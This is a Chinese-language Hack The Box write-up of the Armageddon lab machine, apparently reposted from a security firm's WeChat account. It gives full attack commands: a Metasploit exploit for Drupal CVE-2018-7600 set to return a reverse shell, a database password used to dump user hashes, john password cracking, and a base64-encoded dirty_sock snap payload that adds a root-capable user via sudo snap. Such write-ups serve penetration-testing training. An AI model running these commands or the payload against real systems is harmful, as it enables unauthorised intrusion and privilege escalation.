Hack The Box-Armageddon

admin 2022年6月27日11:48:53评论71 views字数 2733阅读9分6秒阅读模式

0x01 靶场描述

    Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。Armageddon特性如图:

Hack The Box-Armageddon

0x02 靶场复现

知识点: 端口扫描、漏洞查找Drupal 远程代码执行漏洞-CVE-2018-7600snap提权


一、端口扫描、漏洞查找、Drupal 远程代码执行漏洞-CVE-2018-7600


1.使用nmap扫描,发现该目标开启了22和80端口,且存在robots.txt敏感目录文件

nmap -A -sS -sV -sC 10.10.10.233 #-A强力扫描 -sS SYN扫描 -sV识别服务版本 -sC调用脚本扫描

Hack The Box-Armageddon


2.访问robots.txt,发现存在/MAINTAINERS.txt(该文件是维护文件)

Hack The Box-Armageddon


3.访问/MAINTAINERS.txt文件发现Drupal版本为7

Hack The Box-Armageddon


4.使用msf集成的Drupal-CVE-2018-7600模块攻击,得到一个shell

search drupaluse 1set rhosts 10.10.10.233set lhost 10.10.14.5exploit

Hack The Box-Armageddon


5.进入shell,查询数据库网站用户,发现存在brucetherealadmin用户

优化shell:/bin/bash -i
查询数据库网站用户:mysql -u "drupaluser" -h "localhost" "-pCQHEy@9M*m23gBVj" "drupal" -e "select uid, name, pass from users;"

Hack The Box-Armageddon


6.使用john解码,得到密码为booboo

john 1

Hack The Box-Armageddon


7.使用ssh登录,获取用户的flag

使用ssh登录ssh brucetherealadmin@10.10.10.233 密码为:booboo
查看flagcat user.txt

Hack The Box-Armageddon



二、snap提权


1.查看sudo权限,发现/usr/bin/snap可以通过root权限进行安装

sudo -l

Hack The Box-Armageddon

    

2.生成一个snap的马并运行

参考链接:https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html
生成指令:python2 -c 'print"aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw"+ "A"*4256 + "=="' | base64 -d > exploit.snap
运行指令:sudo /usr/bin/snap install --devmode exploit.snap

Hack The Box-Armageddon


3.切换到dirty_sock用户,密码也是dirty_sock,可直接切换到root用户,获取root的flag

切换到dirty_sock用户su dirty_sock
切换到rootsudo -i
获取flagcat root.txt

Hack The Box-Armageddon

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):Hack The Box-Armageddon

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月27日11:48:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hack The Box-Armageddonhttp://cn-sec.com/archives/1146344.html

发表评论

匿名网友 填写信息